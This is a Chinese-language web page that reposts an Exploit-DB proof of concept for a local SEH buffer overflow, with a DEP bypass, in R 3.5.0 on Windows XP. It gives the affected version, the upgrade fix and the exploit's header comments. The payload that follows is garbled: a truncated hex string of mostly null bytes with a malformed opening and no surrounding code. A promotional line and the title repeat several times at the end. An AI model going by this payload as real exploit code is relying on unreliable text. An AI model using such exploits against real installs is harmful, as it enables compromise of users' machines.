R 3.5.0 本地缓冲区溢出漏洞(SEH)利用代码

漏洞总结 漏洞概述 标题: R 3.5.0 - Local Buffer Overflow (SEH) EDB-ID: 46288 CVE: N/A (待确认) 作者: DINO COVOTSOS (Telspaces Systems) 类型: LOCAL (本地) 平台: WINDOWS 发布日期: 2019-01-31 描述: 这是一个针对 R 3.5.0 版本的本地缓冲区溢出漏洞利用 (SEH - Structured Exception Handler)。该漏洞利用 SEH 覆盖和 DEP 绕过技术。 影响范围 受影响软件: R (R Project) 受影响版本: 3.5.0 测试环境: Windows XP Prof SP3 ENG x86 软件链接: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe 修复方案 建议升级 R 软件至最新稳定版本以修复此缓冲区溢出漏洞。 POC/利用代码** ```python #!/usr/bin/python Exploit Title: R380 3.5.0 - Local Buffer Overflow (SEH) Date: 30/01/2019 Exploit Author: Dino Covotsos - Telspaces Systems Vendor Homepage: https://www.r-project.org/ Version: 3.5.0 Software Link: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe Contact: services@telspaces.co.za Twitter: @telspacesystems (Greetings to the Telspaces Crew) Version: 3.5.0 Tested on: Windows XP Prof SP3 ENG x86 Note: SEH exploitation method (SEH + DEP Bypass exploit for Windows 7 x86 by Bzry available on exploit-db) CVE: TBC from Mitre Created in preparation for OSCE - DC - Telspaces Systems POC (注：下方为一段十六进制字符串，代表 Shellcode 或 Payload 的一部分，因截图原因中间部分被截断) [x8b\x75\x20\x04\x01\x00\x00\x33\x04\x70\x08\x00\x00\x34\x0f\x01\x00 \x40\x1c\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x73\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x0

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

R 3.5.0 本地缓冲区溢出漏洞(SEH)利用代码

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

R 3.5.0 本地缓冲区溢出漏洞(SEH)利用代码

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！